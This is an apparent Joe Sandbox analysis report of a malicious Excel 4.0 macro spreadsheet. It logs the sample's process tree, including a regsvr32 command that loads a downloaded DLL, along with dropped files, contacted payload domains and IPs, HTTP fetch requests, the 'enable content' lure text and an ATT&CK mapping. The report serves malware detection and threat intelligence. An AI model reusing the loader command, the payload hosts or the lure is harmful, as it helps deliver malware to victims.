Loading ...

Play interactive tourEdit tour

Analysis Report documents-351331057.xlsm

Overview

General Information

Sample Name:documents-351331057.xlsm
Analysis ID:384712
MD5:672eb871d16413c505302778d8bf1cf9
SHA1:f88277af9b7f69e32b3c7cd74f8b25804933c093
SHA256:17ab700a69c80c034abefa11b191c5ef211f534442c7688256fb200d5b2f25a1
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2840 cmdline: regsvr32 -s ..\ghnrope MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2912 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2852 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2828 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2836 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknownHTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.22:49169 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.22:49172 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.22:49173 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 0604[1].gif.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 4MB later: 127MB
    Source: global trafficDNS query: name: runolfsson-jayde07s.ru.com
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 162.251.80.27:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 8.211.4.209:80
    Source: Joe Sandbox ViewIP Address: 162.251.80.27 162.251.80.27
    Source: Joe Sandbox ViewIP Address: 8.211.4.209 8.211.4.209
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cremin-ian07u.ru.comConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52523888.pngJump to behavior
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: runolfsson-jayde07s.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ind.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cremin-ian07u.ru.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: runolfsson-jayde07s.ru.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Fri, 09 Apr 2021 14:44:00 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 76Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: regsvr32.exe, 00000003.00000002.2094330017.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2094888849.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2095601531.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2096377715.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096826781.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
    Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
    Source: unknownHTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.22:49169 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.22:49172 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.22:49173 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
    Source: Screenshot number: 4Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
    Source: Screenshot number: 8Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: documents-351331057.xlsmInitial sample: CALL
    Source: documents-351331057.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: documents-351331057.xlsmInitial sample: Sheet size: 24417
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gifJump to dropped file
    Source: workbook.xmlBinary string: " sheetId="6" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/><sheet name="Doc3" sheetId="5" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$AO$28</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: classification engineClassification label: mal88.expl.evad.winXLSM@11/18@5/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$documents-351331057.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC3FA.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\ghnrope
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\ghnrope
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: documents-351331057.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gifJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gifJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gifJump to dropped file
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading121OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol14Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer4SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    cesiroinsurance.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://runolfsson-jayde07s.ru.com/ind.html0%Avira URL Cloudsafe
    http://cremin-ian07u.ru.com/ind.html0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    runolfsson-jayde07s.ru.com
    8.211.4.209
    truefalse
      unknown
      cremin-ian07u.ru.com
      8.211.4.209
      truefalse
        unknown
        cesiroinsurance.com
        67.222.38.97
        truefalseunknown
        shalombaptistchapel.com
        162.251.80.27
        truefalse
          unknown
          innermetransformation.com
          173.201.252.173
          truefalse
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://runolfsson-jayde07s.ru.com/ind.htmlfalse
            • Avira URL Cloud: safe
            unknown
            http://cremin-ian07u.ru.com/ind.htmlfalse
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2094330017.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2094888849.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2095601531.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2096377715.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096826781.0000000001C70000.00000002.00000001.sdmpfalse
            • Avira URL Cloud: safe
            low

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            162.251.80.27
            shalombaptistchapel.comUnited States
            394695PUBLIC-DOMAIN-REGISTRYUSfalse
            67.222.38.97
            cesiroinsurance.comUnited States
            46606UNIFIEDLAYER-AS-1USfalse
            173.201.252.173
            innermetransformation.comUnited States
            26496AS-26496-GO-DADDY-COM-LLCUSfalse
            8.211.4.209
            runolfsson-jayde07s.ru.comSingapore
            45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:384712
            Start date:09.04.2021
            Start time:16:43:09
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 46s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:documents-351331057.xlsm
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal88.expl.evad.winXLSM@11/18@5/4
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsm
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 192.35.177.64, 8.241.82.126, 8.238.36.254, 8.241.88.254, 8.241.83.126, 8.238.35.254, 23.0.174.200, 23.0.174.185
            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
            • Report size getting too big, too many NtDeviceIoControlFile calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            162.251.80.27SecuriteInfo.com.Heur.17834.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            SecuriteInfo.com.Heur.9646.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            SecuriteInfo.com.Heur.17834.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            SecuriteInfo.com.Heur.9646.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            Claim-2016732059-02092021.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            Claim-2016732059-02092021.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            Claim-1610138277-02092021.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            Claim-1610138277-02092021.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            Claim-1361835343-02092021.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            Claim-1361835343-02092021.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            Claim-495018568-02092021.xlsGet hashmaliciousBrowse
            • immanta.com/zrqzfrsvu/3806249.jpg
            67.222.38.97documents-1819557117.xlsmGet hashmaliciousBrowse
              documents-1819557117.xlsmGet hashmaliciousBrowse
                173.201.252.173documents-1819557117.xlsmGet hashmaliciousBrowse
                  documents-1819557117.xlsmGet hashmaliciousBrowse
                    8.211.4.209documents-1819557117.xlsmGet hashmaliciousBrowse
                    • cremin-ian07u.ru.com/ind.html
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • cremin-ian07u.ru.com/ind.html
                    documents-2112491607.xlsmGet hashmaliciousBrowse
                    • corwin-tommie06f.ru.com/index.html
                    documents-1660683173.xlsmGet hashmaliciousBrowse
                    • corwin-tommie06f.ru.com/index.html
                    1234.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    12345.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    1234.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-748443571.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    12345.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-1887159634.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-748443571.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-1887159634.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-683917632.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-683917632.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-1760163871.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif
                    documents-1760163871.xlsmGet hashmaliciousBrowse
                    • mills-skyla30ec.com/gg.gif

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    cremin-ian07u.ru.comdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 8.211.4.209
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 8.211.4.209
                    innermetransformation.comdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 173.201.252.173
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 173.201.252.173
                    shalombaptistchapel.comdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    runolfsson-jayde07s.ru.comdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 8.211.4.209
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 8.211.4.209
                    cesiroinsurance.comdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 67.222.38.97
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 67.222.38.97

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    PUBLIC-DOMAIN-REGISTRYUSDUBAI UAEGH092021.exeGet hashmaliciousBrowse
                    • 208.91.199.135
                    PAGO FACTURA V-8680.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    usd 420232.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    P037725600.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    VAT INVOICE.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    VAT INVOICE.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    NEW ORDER.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    TRANSFERENCIA AL EXTERIOR U810295.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    PAYMENT SWIFT COPY MT103.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    UPDATED SOA.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    BANK PAYMENT.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    document-1245492889.xlsGet hashmaliciousBrowse
                    • 5.100.155.169
                    VAT INVOICE.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    IMG_00000000001.PDF.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    documents-2112491607.xlsmGet hashmaliciousBrowse
                    • 111.118.215.222
                    FED8GODpaD.xlsbGet hashmaliciousBrowse
